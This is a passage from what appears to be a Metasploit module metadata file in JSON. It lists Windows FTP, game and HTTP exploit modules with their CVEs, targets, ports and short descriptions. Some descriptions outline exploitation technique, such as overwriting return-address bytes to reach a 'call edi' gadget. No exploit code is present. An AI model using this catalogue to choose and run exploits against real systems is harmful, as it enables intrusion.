"autofilter_services": [
"ftp"
],
"targets": [
"Serv-U Uber-Leet Universal ServUDaemon.exe",
"Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe",
"Serv-U 5.0.0.0 ServUDaemon.exe"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/servu_mdtm.rb",
"is_install_path": true,
"ref_name": "windows/ftp/servu_mdtm",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/slimftpd_list_concat": {
"name": "SlimFTPd LIST Concatenation Overflow",
"full_name": "exploit/windows/ftp/slimftpd_list_concat",
"rank": 500,
"disclosure_date": "2005-07-21",
"type": "exploit",
"author": [
"Fairuzan Roslan <riaf@mysec.org>"
],
"description": "This module exploits a stack buffer overflow in the SlimFTPd\n server. The flaw is triggered when a LIST command is\n received with an overly-long argument. This vulnerability\n affects all versions of SlimFTPd prior to 3.16 and was\n discovered by Raphael Rigo.",
"references": [
"CVE-2005-2373",
"OSVDB-18172",
"BID-14339"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"SlimFTPd Server <= 3.16 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/slimftpd_list_concat.rb",
"is_install_path": true,
"ref_name": "windows/ftp/slimftpd_list_concat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/trellian_client_pasv": {
"name": "Trellian FTP Client 3.01 PASV Remote Buffer Overflow",
"full_name": "exploit/windows/ftp/trellian_client_pasv",
"rank": 300,
"disclosure_date": "2010-04-11",
"type": "exploit",
"author": [
"zombiefx",
"dookie"
],
"description": "This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered\n through an excessively long PASV message.",
"references": [
"CVE-2010-1465",
"OSVDB-63812",
"EDB-12152"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/trellian_client_pasv.rb",
"is_install_path": true,
"ref_name": "windows/ftp/trellian_client_pasv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/turboftp_port": {
"name": "Turbo FTP Server 1.30.823 PORT Overflow",
"full_name": "exploit/windows/ftp/turboftp_port",
"rank": 500,
"disclosure_date": "2012-10-03",
"type": "exploit",
"author": [
"Zhao Liang",
"Lincoln",
"corelanc0d3r",
"thelightcosine"
],
"description": "This module exploits a buffer overflow vulnerability found in the PORT\n command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote\n code execution under the context of SYSTEM.",
"references": [
"EDB-22161",
"OSVDB-85887"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic",
"Windows Universal TurboFtp 1.30.823",
"Windows Universal TurboFtp 1.30.826"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/turboftp_port.rb",
"is_install_path": true,
"ref_name": "windows/ftp/turboftp_port",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/vermillion_ftpd_port": {
"name": "Vermillion FTP Daemon PORT Command Memory Corruption",
"full_name": "exploit/windows/ftp/vermillion_ftpd_port",
"rank": 500,
"disclosure_date": "2009-09-23",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an out-of-bounds array access in the Arcane Software\n Vermillion FTP server. By sending a specially crafted FTP PORT command,\n an attacker can corrupt stack memory and execute arbitrary code.\n\n This particular issue is caused by processing data bound by attacker\n controlled input while writing into a 4 byte stack buffer. Unfortunately,\n the writing that occurs is not a simple byte copy.\n\n Processing is done using a source ptr (p) and a destination pointer (q).\n The vulnerable function walks the input string and continues while the\n source byte is non-null. If a comma is encountered, the function increments\n the destination pointer. If an ascii digit [0-9] is encountered, the\n following occurs:\n\n *q = (*q * 10) + (*p - '0');\n\n All other input characters are ignored in this loop.\n\n As a consequence, an attacker must craft input such that modifications\n to the current values on the stack result in usable values. In this exploit,\n the low two bytes of the return address are adjusted to point at the\n location of a 'call edi' instruction within the binary. This was chosen\n since 'edi' points at the source buffer when the function returns.\n\n NOTE: This server can be installed as a service using \"vftpd.exe install\".\n If so, the service does not restart automatically, giving an attacker only\n one attempt.",
"references": [
"OSVDB-62163",
"EDB-11293"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic Targeting",
"vftpd 1.31 - Windows XP SP3 English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/ftp/vermillion_ftpd_port.rb",
"is_install_path": true,
"ref_name": "windows/ftp/vermillion_ftpd_port",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/warftpd_165_pass": {
"name": "War-FTPD 1.65 Password Overflow",
"full_name": "exploit/windows/ftp/warftpd_165_pass",
"rank": 200,
"disclosure_date": "1998-03-19",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploits the buffer overflow found in the PASS command\n in War-FTPD 1.65. This particular module will only work\n reliably against Windows 2000 targets. The server must be\n configured to allow anonymous logins for this exploit to\n succeed. A failed attempt will bring down the service\n completely.",
"references": [
"CVE-1999-0256",
"OSVDB-875",
"BID-10078"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/warftpd_165_pass.rb",
"is_install_path": true,
"ref_name": "windows/ftp/warftpd_165_pass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/warftpd_165_user": {
"name": "War-FTPD 1.65 Username Overflow",
"full_name": "exploit/windows/ftp/warftpd_165_user",
"rank": 200,
"disclosure_date": "1998-03-19",
"type": "exploit",
"author": [
"Fairuzan Roslan <riaf@mysec.org>"
],
"description": "This module exploits a buffer overflow found in the USER command\n of War-FTPD 1.65.",
"references": [
"CVE-1999-0256",
"OSVDB-875",
"BID-10078"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic",
"Windows 2000 SP0-SP4 English",
"Windows XP SP0-SP1 English",
"Windows XP SP2 English",
"Windows XP SP3 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/warftpd_165_user.rb",
"is_install_path": true,
"ref_name": "windows/ftp/warftpd_165_user",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/wftpd_size": {
"name": "Texas Imperial Software WFTPD 3.23 SIZE Overflow",
"full_name": "exploit/windows/ftp/wftpd_size",
"rank": 200,
"disclosure_date": "2006-08-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the SIZE verb in\n Texas Imperial Software's WFTPD 3.23.",
"references": [
"CVE-2006-4318",
"OSVDB-28134",
"BID-19617"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows XP Pro SP1 English",
"Windows XP Pro SP2 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/wftpd_size.rb",
"is_install_path": true,
"ref_name": "windows/ftp/wftpd_size",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/winaxe_server_ready": {
"name": "WinaXe 7.7 FTP Client Remote Buffer Overflow",
"full_name": "exploit/windows/ftp/winaxe_server_ready",
"rank": 400,
"disclosure_date": "2016-11-03",
"type": "exploit",
"author": [
"Chris Higgins",
"hyp3rlix"
],
"description": "This module exploits a buffer overflow in the WinaXe 7.7 FTP client.\n This issue is triggered when a client connects to the server and is\n expecting the Server Ready response.",
"references": [
"EDB-40693",
"URL-http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/winaxe_server_ready.rb",
"is_install_path": true,
"ref_name": "windows/ftp/winaxe_server_ready",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/wing_ftp_admin_exec": {
"name": "Wing FTP Server Authenticated Command Execution",
"full_name": "exploit/windows/ftp/wing_ftp_admin_exec",
"rank": 600,
"disclosure_date": "2014-06-19",
"type": "exploit",
"author": [
"Nicholas Nam <nick@executionflow.org>",
"Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>"
],
"description": "This module exploits the embedded Lua interpreter in the admin web interface for\n versions 3.0.0 and above. When supplying a specially crafted HTTP POST request\n an attacker can use os.execute() to execute arbitrary system commands on\n the target with SYSTEM privileges.",
"references": [
"URL-http://www.wftpserver.com",
"URL-https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm"
],
"platform": "Windows",
"arch": "x86",
"rport": 5466,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Wing FTP Server >= 3.0.0"
],
"mod_time": "2019-02-10 14:26:13 +0000",
"path": "/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb",
"is_install_path": true,
"ref_name": "windows/ftp/wing_ftp_admin_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/wsftp_server_503_mkd": {
"name": "WS-FTP Server 5.03 MKD Overflow",
"full_name": "exploit/windows/ftp/wsftp_server_503_mkd",
"rank": 500,
"disclosure_date": "2004-11-29",
"type": "exploit",
"author": [
"et <et@metasploit.com>",
"Reed Arvin <reedarvin@gmail.com>"
],
"description": "This module exploits the buffer overflow found in the MKD\n command in IPSWITCH WS_FTP Server 5.03 discovered by Reed\n Arvin.",
"references": [
"CVE-2004-1135",
"OSVDB-12509",
"BID-11772"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"WS-FTP Server 5.03 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb",
"is_install_path": true,
"ref_name": "windows/ftp/wsftp_server_503_mkd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/wsftp_server_505_xmd5": {
"name": "Ipswitch WS_FTP Server 5.05 XMD5 Overflow",
"full_name": "exploit/windows/ftp/wsftp_server_505_xmd5",
"rank": 200,
"disclosure_date": "2006-09-14",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the XMD5 verb in\n IPSWITCH WS_FTP Server 5.05.",
"references": [
"CVE-2006-4847",
"OSVDB-28939",
"BID-20076"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows XP Pro SP0 English",
"Windows XP Pro SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb",
"is_install_path": true,
"ref_name": "windows/ftp/wsftp_server_505_xmd5",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/xftp_client_pwd": {
"name": "Xftp FTP Client 3.0 PWD Remote Buffer Overflow",
"full_name": "exploit/windows/ftp/xftp_client_pwd",
"rank": 300,
"disclosure_date": "2010-04-22",
"type": "exploit",
"author": [
"zombiefx",
"dookie"
],
"description": "This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered\n through an excessively long PWD message.",
"references": [
"OSVDB-63968",
"EDB-12332"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/xftp_client_pwd.rb",
"is_install_path": true,
"ref_name": "windows/ftp/xftp_client_pwd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/xlink_client": {
"name": "Xlink FTP Client Buffer Overflow",
"full_name": "exploit/windows/ftp/xlink_client",
"rank": 300,
"disclosure_date": "2009-10-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Xlink FTP Client 32\n Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2.\n When an overly long FTP server response is received by a client,\n arbitrary code may be executed.",
"references": [
"CVE-2006-5792",
"OSVDB-33969",
"URL-http://www.xlink.com"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP3 English",
"Windows 2000 SP4 English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/ftp/xlink_client.rb",
"is_install_path": true,
"ref_name": "windows/ftp/xlink_client",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/xlink_server": {
"name": "Xlink FTP Server Buffer Overflow",
"full_name": "exploit/windows/ftp/xlink_server",
"rank": 400,
"disclosure_date": "2009-10-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Xlink FTP Server\n that comes bundled with Omni-NFS Enterprise 5.2.\n When an overly long FTP request is sent to the server,\n arbitrary code may be executed.",
"references": [
"CVE-2006-5792",
"OSVDB-58646",
"URL-http://www.xlink.com"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Omni-NFS Enterprise V5.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/xlink_server.rb",
"is_install_path": true,
"ref_name": "windows/ftp/xlink_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/games/mohaa_getinfo": {
"name": "Medal of Honor Allied Assault getinfo Stack Buffer Overflow",
"full_name": "exploit/windows/games/mohaa_getinfo",
"rank": 500,
"disclosure_date": "2004-07-17",
"type": "exploit",
"author": [
"Jacopo Cervini"
],
"description": "This module exploits a stack based buffer overflow in the getinfo\n command of Medal Of Honor Allied Assault.",
"references": [
"CVE-2004-0735",
"OSVDB-8061",
"EDB-357",
"BID-10743"
],
"platform": "Windows",
"arch": "",
"rport": 12203,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Medal Of Honor Allied Assault v 1.0 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/games/mohaa_getinfo.rb",
"is_install_path": true,
"ref_name": "windows/games/mohaa_getinfo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/games/racer_503beta5": {
"name": "Racer v0.5.3 Beta 5 Buffer Overflow",
"full_name": "exploit/windows/games/racer_503beta5",
"rank": 500,
"disclosure_date": "2008-08-10",
"type": "exploit",
"author": [
"Trancek <trancek@yashira.org>"
],
"description": "This module exploits the Racer Car and Racing Simulator game\n versions v0.5.3 beta 5 and earlier. Both the client and server listen\n on UDP port 26000. By sending an overly long buffer we are able to\n execute arbitrary code remotely.",
"references": [
"CVE-2007-4370",
"OSVDB-39601",
"EDB-4283",
"BID-25297"
],
"platform": "Windows",
"arch": "",
"rport": 26000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Fmodex.dll - Universal",
"Win XP SP2 English",
"Win XP SP2 Spanish"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/games/racer_503beta5.rb",
"is_install_path": true,
"ref_name": "windows/games/racer_503beta5",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/games/ut2004_secure": {
"name": "Unreal Tournament 2004 \"secure\" Overflow (Win32)",
"full_name": "exploit/windows/games/ut2004_secure",
"rank": 400,
"disclosure_date": "2004-06-18",
"type": "exploit",
"author": [
"stinko <vinnie@metasploit.com>"
],
"description": "This is an exploit for the GameSpy secure query in\n the Unreal Engine.\n\n This exploit only requires one UDP packet, which can\n be both spoofed and sent to a broadcast address.\n Usually, the GameSpy query server listens on port 7787,\n but you can manually specify the port as well.\n\n The RunServer.sh script will automatically restart the\n server upon a crash, giving us the ability to\n bruteforce the service and exploit it multiple\n times.",
"references": [
"CVE-2004-0608",
"OSVDB-7217",
"BID-10570"
],
"platform": "Windows",
"arch": "",
"rport": 7787,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"UT2004 Build 3186"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/games/ut2004_secure.rb",
"is_install_path": true,
"ref_name": "windows/games/ut2004_secure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/adobe_robohelper_authbypass": {
"name": "Adobe RoboHelp Server 8 Arbitrary File Upload and Execute",
"full_name": "exploit/windows/http/adobe_robohelper_authbypass",
"rank": 600,
"disclosure_date": "2009-09-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability which\n allows remote attackers to upload and execute arbitrary code.",
"references": [
"CVE-2009-3068",
"OSVDB-57896",
"URL-http://www.intevydis.com/blog/?p=69",
"ZDI-09-066"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal Windows Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/adobe_robohelper_authbypass.rb",
"is_install_path": true,
"ref_name": "windows/http/adobe_robohelper_authbypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/altn_securitygateway": {
"name": "Alt-N SecurityGateway username Buffer Overflow",
"full_name": "exploit/windows/http/altn_securitygateway",
"rank": 200,
"disclosure_date": "2008-06-02",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "Alt-N SecurityGateway is prone to a buffer overflow condition. This\n is due to insufficient bounds checking on the \"username\"\n parameter. Successful exploitation could result in code\n execution with SYSTEM level privileges.\n\n NOTE: This service doesn't restart, you'll only get one shot. However,\n it often survives a successful exploitation attempt.",
"references": [
"CVE-2008-4193",
"OSVDB-45854",
"BID-29457"
],
"platform": "Windows",
"arch": "",
"rport": 4000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"SecurityGateway 1.0.1 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/altn_securitygateway.rb",
"is_install_path": true,
"ref_name": "windows/http/altn_securitygateway",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/altn_webadmin": {
"name": "Alt-N WebAdmin USER Buffer Overflow",
"full_name": "exploit/windows/http/altn_webadmin",
"rank": 200,
"disclosure_date": "2003-06-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "Alt-N WebAdmin is prone to a buffer overflow condition. This\n is due to insufficient bounds checking on the USER\n parameter. Successful exploitation could result in code\n execution with SYSTEM level privileges.",
"references": [
"CVE-2003-0471",
"OSVDB-2207",
"BID-8024",
"URL-http://www.nessus.org/plugins/index.php?view=single&id=11771"
],
"platform": "Windows",
"arch": "",
"rport": 1000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"WebAdmin 2.0.4 Universal",
"WebAdmin 2.0.3 Universal",
"WebAdmin 2.0.2 Universal",
"WebAdmin 2.0.1 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/altn_webadmin.rb",
"is_install_path": true,
"ref_name": "windows/http/altn_webadmin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/amlibweb_webquerydll_app": {
"name": "Amlibweb NetOpacs webquery.dll Stack Buffer Overflow",
"full_name": "exploit/windows/http/amlibweb_webquerydll_app",
"rank": 300,
"disclosure_date": "2010-08-03",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Amlib's Amlibweb\n Library Management System (NetOpacs). The webquery.dll\n API is available through IIS requests. By specifying\n an overly long string to the 'app' parameter, SEH can be\n reliably overwritten allowing for arbitrary remote code execution.\n In addition, it is possible to overwrite EIP by specifying\n an arbitrary parameter name with an '=' terminator.",
"references": [
"OSVDB-66814",
"BID-42293",
"URL-http://www.aushack.com/advisories/"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro All - English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/amlibweb_webquerydll_app.rb",
"is_install_path": true,
"ref_name": "windows/http/amlibweb_webquerydll_app",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/apache_chunked": {
"name": "Apache Win32 Chunked Encoding",
"full_name": "exploit/windows/http/apache_chunked",
"rank": 400,
"disclosure_date": "2002-06-19",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits the chunked transfer integer wrap\n vulnerability in Apache version 1.2.x to 1.3.24. This\n particular module has been tested with all versions of the\n official Win32 build between 1.3.9 and 1.3.24. Additionally,\n it should work against most co-branded and bundled versions\n of Apache (Oracle 8i, 9i, IBM HTTPD, etc).\n\n You will need to use the Check() functionality to determine\n the exact target version prior to launching the exploit. The\n version of Apache bundled with Oracle 8.1.7 will not\n automatically restart, so if you use the wrong target value,\n the server will crash.",
"references": [
"CVE-2002-0392",
"OSVDB-838",
"BID-5033"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Generic Bruteforce",
"Apache.org Build 1.3.9->1.3.19",
"Apache.org Build 1.3.22->1.3.24",
"Apache.org Build 1.3.19->1.3.24",
"Apache.org Build 1.3.22",
"Apache.org Build 1.3.17->1.3.24 (Windows 2000)",
"Apache.org Build 1.3.17->1.3.24 (Windows NT)",
"Windows 2003 English SP0",
"Windows 2000 English",
"Oracle 8.1.7 Apache 1.3.12",
"Oracle 9.1.0 Apache 1.3.12",
"Oracle 9.2.0 Apache 1.3.22",
"Debugging Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/apache_chunked.rb",
"is_install_path": true,
"ref_name": "windows/http/apache_chunked",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/apache_mod_rewrite_ldap": {
"name": "Apache Module mod_rewrite LDAP Protocol Buffer Overflow",
"full_name": "exploit/windows/http/apache_mod_rewrite_ldap",
"rank": 500,
"disclosure_date": "2006-07-28",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the mod_rewrite LDAP protocol scheme handling\n flaw discovered by Mark Dowd, which produces an off-by-one overflow.\n Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.\n This module requires REWRITEPATH to be set accurately. In addition,\n the target must have 'RewriteEngine on' configured, with a specific\n 'RewriteRule' condition enabled to allow for exploitation.\n\n The flaw affects multiple platforms, however this module currently\n only supports Windows based installations.",
"references": [
"CVE-2006-3747",
"OSVDB-27588",
"BID-19204",
"URL-http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html",
"EDB-3680",
"EDB-3996",
"EDB-2237"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb",
"is_install_path": true,
"ref_name": "windows/http/apache_mod_rewrite_ldap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/apache_modjk_overflow": {
"name": "Apache mod_jk 1.2.20 Buffer Overflow",
"full_name": "exploit/windows/http/apache_modjk_overflow",
"rank": 500,
"disclosure_date": "2007-03-02",
"type": "exploit",
"author": [
"Nicob <nicob@nicob.net>"
],
"description": "This is a stack buffer overflow exploit for mod_jk 1.2.20.\n Should work on any Win32 OS.",
"references": [
"CVE-2007-0774",
"OSVDB-33855",
"BID-22791",
"ZDI-07-008"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/apache_modjk_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/apache_modjk_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/avaya_ccr_imageupload_exec": {
"name": "Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution",
"full_name": "exploit/windows/http/avaya_ccr_imageupload_exec",
"rank": 600,
"disclosure_date": "2012-06-28",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability on Avaya IP Office\n Customer Call Reporter, which allows a remote user to upload arbitrary files\n through the ImageUpload.ashx component. It can be abused to upload and execute\n arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP\n Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.",
"references": [
"CVE-2012-3811",
"OSVDB-83399",
"BID-54225",
"URL-https://downloads.avaya.com/css/P8/documents/100164021",
"ZDI-12-106"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Avaya IP Office Customer Call Reporter 7.0 and 8.0 / Microsoft Windows Server 2003 SP2"
],
"mod_time": "2019-01-09 06:32:22 +0000",
"path": "/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/avaya_ccr_imageupload_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/badblue_ext_overflow": {
"name": "BadBlue 2.5 EXT.dll Buffer Overflow",
"full_name": "exploit/windows/http/badblue_ext_overflow",
"rank": 500,
"disclosure_date": "2003-04-20",
"type": "exploit",
"author": [
"acaro <acaro@jervus.it>"
],
"description": "This is a stack buffer overflow exploit for BadBlue version 2.5.",
"references": [
"CVE-2005-0595",
"OSVDB-14238",
"BID-7387"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"BadBlue 2.5 (Universal)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/badblue_ext_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/badblue_ext_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/badblue_passthru": {
"name": "BadBlue 2.72b PassThru Buffer Overflow",
"full_name": "exploit/windows/http/badblue_passthru",
"rank": 500,
"disclosure_date": "2007-12-10",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the PassThru\n functionality in ext.dll in BadBlue 2.72b and earlier.",
"references": [
"CVE-2007-6377",
"OSVDB-42416",
"BID-26803"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"BadBlue EE 2.7 Universal",
"BadBlue 2.72b Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/badblue_passthru.rb",
"is_install_path": true,
"ref_name": "windows/http/badblue_passthru",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/bea_weblogic_jsessionid": {
"name": "BEA WebLogic JSESSIONID Cookie Value Overflow",
"full_name": "exploit/windows/http/bea_weblogic_jsessionid",
"rank": 400,
"disclosure_date": "2009-01-13",
"type": "exploit",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable\n code is only accessible when clustering is configured. A request containing a\n long JSESSION cookie value can lead to arbitrary code execution.",
"references": [
"CVE-2008-5457",
"OSVDB-51311"
],
